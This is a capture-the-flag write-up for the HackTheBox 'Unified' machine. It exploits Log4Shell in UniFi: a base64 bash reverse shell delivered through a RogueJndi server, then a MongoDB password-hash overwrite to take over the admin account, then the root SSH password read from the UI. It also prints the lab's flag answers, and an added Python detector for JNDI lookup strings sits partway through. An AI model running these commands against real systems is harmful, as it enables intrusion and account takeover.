HTB: Unified [Write-up]

Contents

Connect to the HTB server and start the target machine

1.Which are the first four open ports?

2.What is the title of the software that is running on port 8443?

3.What is the version of the software that is running?

4.What is the CVE for the identified vulnerability?

5.What protocol does JNDI leverage in the injection?

6.What tool do we use to intercept the traffic, indicating the attack was successful?

7.What port do we need to inspect intercepted traffic for?

8.What port is the MongoDB service running on?

USER_FLAG:6ced1a6a89e666c0620cdb10262ba127

9.What is the default database name for UniFi applications?

10.What is the function we use to enumerate users within the database in MongoDB?

11.What is the function we use to update users within the database in MongoDB?

12.What is the password for the root user?

ROOT_FLAG:e50bc93c75b634e4b272d2f771c33681


Connect to the HTB server and start the target machine

Target IP: 10.129.55.252

Assigned IP: 10.10.16.48


1.Which are the first four open ports?

Scan the target's open ports with nmap:

nmap -Pn {TARGET_IP}

The open ports are: 22, 6789, 8080, 8443


2.What is the title of the software that is running on port 8443?

Run an nmap script scan against port 8443 of the target:

nmap -sC -p 8443 -Pn {TARGET_IP}

The scan output shows: http-title: UniFi Network


3.What is the version of the software that is running?

Open the target directly in a browser: http://{TARGET_IP}:8443

The UniFi software version shown is: 6.4.54


4.What is the CVE for the identified vulnerability?

Search for UniFi on cve.mitre.org:

Platform address: https://cve.mitre.org/

We can see that CVE-2021-44530 affects UniFi versions 6.5.53 and earlier:

The answer is the Log4j vulnerability identifier given in that description: CVE-2021-44228


5.What protocol does JNDI leverage in the injection?

JNDI injection leverages two protocols:

LDAP:

(Lightweight Directory Access Protocol; crafted data can make the application connect to an attacker-controlled server and execute remote code)

RMI:

(Remote Method Invocation; the attacker runs a malicious server that registers a remote object, which the application fetches and executes)
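From the defender's side, the lookup string that triggers these LDAP/RMI callbacks is visible in the web server's access log. The following detector is an added example, not code from the write-up: it scans constructed sample log lines (documentation-range addresses, hypothetical paths) for `${jndi:...}` lookups after undoing URL-encoding and the common `${lower:..}` / `${::-..}` obfuscations.

```python
import re
from urllib.parse import unquote

# Innermost obfuscating lookups: ${lower:j}, ${upper:J}, ${::-j}, ${env:NOPE:-j}
_OBFUSCATION = re.compile(
    r"\$\{(lower|upper):([^{}]*)\}|\$\{[^{}]*?:-([^{}]*)\}", re.IGNORECASE)
# The lookup that makes Log4j open an outbound JNDI connection (LDAP, RMI, ...).
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:[^}]*\}",
    re.IGNORECASE)


def _peel(m: re.Match) -> str:
    """Replace one obfuscating lookup with the character it evaluates to."""
    if m.group(1):  # ${lower:x} / ${upper:x}
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    return m.group(3)  # ${...:-x} default-value trick


def normalize(value: str) -> str:
    """Percent-decode (bounded), then peel nested obfuscation lookups inside-out."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    while True:
        value, n = _OBFUSCATION.subn(_peel, value)
        if n == 0:
            return value


def find_jndi_lookups(log_text: str) -> list[tuple[int, str, str]]:
    """Return (line number, protocol, normalized lookup) for every matching line."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        norm = normalize(line)
        for m in _JNDI.finditer(norm):
            hits.append((lineno, m.group(1).lower(), m.group(0)))
    return hits


# Constructed sample access-log lines (not from the page); the User-Agent field
# is a typical injection point because it is logged verbatim.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jan/2022:10:01:12 +0000] "POST /api/login HTTP/1.1" 200 51 "-" "Mozilla/5.0"
192.0.2.11 - - [05/Jan/2022:10:01:13 +0000] "POST /api/login HTTP/1.1" 400 33 "-" "${jndi:ldap://198.51.100.7:1389/o=example}"
192.0.2.11 - - [05/Jan/2022:10:01:14 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fobj%7D HTTP/1.1" 200 12 "-" "curl/7.81"
192.0.2.12 - - [05/Jan/2022:10:01:15 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}${::-n}di:${lower:L}dap://198.51.100.7/a}"
192.0.2.13 - - [05/Jan/2022:10:01:16 +0000] "GET /?text=%24%7Bjndi%3A%20not%20a%20lookup HTTP/1.1" 200 12 "-" "-"
"""

if __name__ == "__main__":
    for lineno, proto, lookup in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {lineno}: {proto.upper()} lookup -> {lookup}")
```

Run against real logs, the same function also catches lookups tucked into other logged headers (Referer, X-Forwarded-For), since it scans the whole line rather than one field.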


6.What tool do we use to intercept the traffic, indicating the attack was successful?

On the login page, tick Remember me, enter a username and password, and click SIGN IN

Start Yakit to capture the login request and resend it; on the local side, start tcpdump to capture local traffic:


7.What port do we need to inspect intercepted traffic for?

In another terminal, use tcpdump to capture traffic on local port 389 (the default LDAP port)

tcpdump -i tun0 port 389

Click submit in Yakit; tcpdump captures the callback traffic, confirming the vulnerability exists:


8.What port is the MongoDB service running on?

Next, hand-craft a reverse shell; first build the base64-encoded payload:

echo 'bash -i >&/dev/tcp/{NATIVE_IP}/{NATIVE_PORT} 0>&1' | base64

接下来使用RogueJndi-1.1.jar用于制作JNDI注入木马:

工具安装:
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package
java -jar RogueJndi-1.1.jar --command "bash -c {echo,{YOUR_BASE64_STRING}}|{base64,-d}|{bash,-i}" --hostname "{NATIVE_IP}"

Next, use nc to listen for the reverse shell:

Note: at first my reverse shell kept failing; if you hit the same problem, check the spaces in the code after --command

nc -lvnp {NATIVE_PORT}

After the reverse shell connects, redirect to bash to get an interactive shell:

script /dev/null -c bash

Then use find to locate the user flag:

find / -name 'user.txt' 2>/dev/null

USER_FLAG:6ced1a6a89e666c0620cdb10262ba127

Use ps to look for the mongo process:

The database is running and listens on port: 27117


9.What is the default database name for UniFi applications?

The question asks for the default database name for UniFi applications; I just threw it at 秘塔AI: ace


10.What is the function we use to enumerate users within the database in MongoDB?

Connect to the mongo database and use db.admin.find() to list all users:

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

This gives us the administrator user's password hash:


11.What is the function we use to update users within the database in MongoDB?

Check the hash type with hashid:

A SHA-512 hash of this kind is unlikely to be cracked by brute force

Use mkpasswd to create a SHA-512 hashed password:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# mkpasswd -m sha-512 123456    
$6$KDE3zv2Zi2Tc3BXD$jT/jQlJ/fjQsdW.qSYnd09UhaqeVoOhqe2SPDet3TD/DoWLEHSFT.7KlI/yg3GG21dqPSi4j7W5wLFYH9Lx4Z/

Next, use the _id obtained earlier to change the password:

"_id" : ObjectId("61ce278f46e0fb0012d47ee4")

Use db.admin.update() to change the administrator user's password to 123456:

mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$KDE3zv2Zi2Tc3BXD$jT/jQlJ/fjQsdW.qSYnd09UhaqeVoOhqe2SPDet3TD/DoWLEHSFT.7KlI/yg3GG21dqPSi4j7W5wLFYH9Lx4Z/"}})'


12.What is the password for the root user?

Return to the browser login page and log in with username administrator and password 123456:

Once in the web admin page, click SETTINGS at the bottom left:

Under SETTINGS, open the Site submenu and scroll down to find the root user's SSH login password:

root user password: NotACrackablePassword4U2022

Try to log in over SSH with this password:

ssh root@{TARGET_IP}

Use find and cat to locate and read root.txt:

find / -name 'root.txt' 2>/dev/null
cat /root/root.txt

ROOT_FLAG:e50bc93c75b634e4b272d2f771c33681
